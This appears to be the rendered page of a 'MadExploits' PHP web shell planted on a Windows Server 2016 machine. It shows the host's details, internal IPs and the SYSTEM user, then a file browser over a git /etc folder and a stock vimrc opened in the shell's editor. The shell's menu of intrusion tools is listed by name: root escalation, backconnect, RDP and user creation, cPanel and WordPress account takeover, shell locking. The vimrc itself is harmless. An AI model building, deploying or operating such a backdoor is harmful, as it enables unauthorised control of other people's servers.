Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
pkcs11
[ DIR ]
drwxrwxrwx
pki
[ DIR ]
drwxrwxrwx
post-install
[ DIR ]
drwxrwxrwx
profile.d
[ DIR ]
drwxrwxrwx
ssh
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
DIR_COLORS
4.25
KB
-rw-rw-rw-
bash.bash_logout
623
B
-rw-rw-rw-
bash.bashrc
2.44
KB
-rw-rw-rw-
docx2txt.config
1.7
KB
-rw-rw-rw-
fstab
272
B
-rw-rw-rw-
gitattributes
515
B
-rw-rw-rw-
gitconfig
389
B
-rw-rw-rw-
inputrc
2.52
KB
-rw-rw-rw-
msystem
3.09
KB
-rw-rw-rw-
nanorc
10.94
KB
-rw-rw-rw-
nsswitch.conf
211
B
-rw-rw-rw-
package-versions.txt
3.75
KB
-rw-rw-rw-
profile
6.21
KB
-rw-rw-rw-
tigrc
18.74
KB
-rw-rw-rw-
vimrc
2.84
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vimrc
" Setting some decent VIM settings for programming " This source file comes from git-for-windows build-extra repository (git-extra/vimrc) ru! defaults.vim " Use Enhanced Vim defaults set mouse= " Reset the mouse setting from defaults aug vimStartup | au! | aug END " Revert last positioned jump, as it is defined below let g:skip_defaults_vim = 1 " Do not source defaults.vim again (after loading this system vimrc) set ai " set auto-indenting on for programming set showmatch " automatically show matching brackets. works like it does in bbedit. set vb " turn on the "visual bell" - which is much quieter than the "audio blink" set laststatus=2 " make the last line where the status is two lines deep so you can see status always set showmode " show the current mode set clipboard=unnamed " set clipboard to unnamed to access the system clipboard under windows set wildmode=list:longest,longest:full " Better command line completion " Show EOL type and last modified timestamp, right after the filename " Set the statusline set statusline=%f " filename relative to current $PWD set statusline+=%h " help file flag set statusline+=%m " modified flag set statusline+=%r " readonly flag set statusline+=\ [%{&ff}] " Fileformat [unix]/[dos] etc... set statusline+=\ (%{strftime(\"%H:%M\ %d/%m/%Y\",getftime(expand(\"%:p\")))}) " last modified timestamp set statusline+=%= " Rest: right align set statusline+=%l,%c%V " Position in buffer: linenumber, column, virtual column set statusline+=\ %P " Position in buffer: Percentage if &term =~ 'xterm-256color' " mintty identifies itself as xterm-compatible if &t_Co == 8 set t_Co = 256 " Use at least 256 colors endif " set termguicolors " Uncomment to allow truecolors on mintty endif "------------------------------------------------------------------------------ " Only do this part when compiled with support for autocommands. if has("autocmd") " Set UTF-8 as the default encoding for commit messages autocmd BufReadPre COMMIT_EDITMSG,MERGE_MSG,git-rebase-todo setlocal fileencoding=utf-8 " Remember the positions in files with some git-specific exceptions" autocmd BufReadPost * \ if line("'\"") > 0 && line("'\"") <= line("$") \ && &filetype !~# 'commit\|gitrebase' \ && expand("%") !~ "ADD_EDIT.patch" \ && expand("%") !~ "addp-hunk-edit.diff" | \ exe "normal! g`\"" | \ endif autocmd BufNewFile,BufRead *.patch set filetype=diff autocmd Filetype diff \ highlight WhiteSpaceEOL ctermbg=red | \ match WhiteSpaceEOL /\(^+.*\)\@<=\s\+$/ endif " has("autocmd")
Close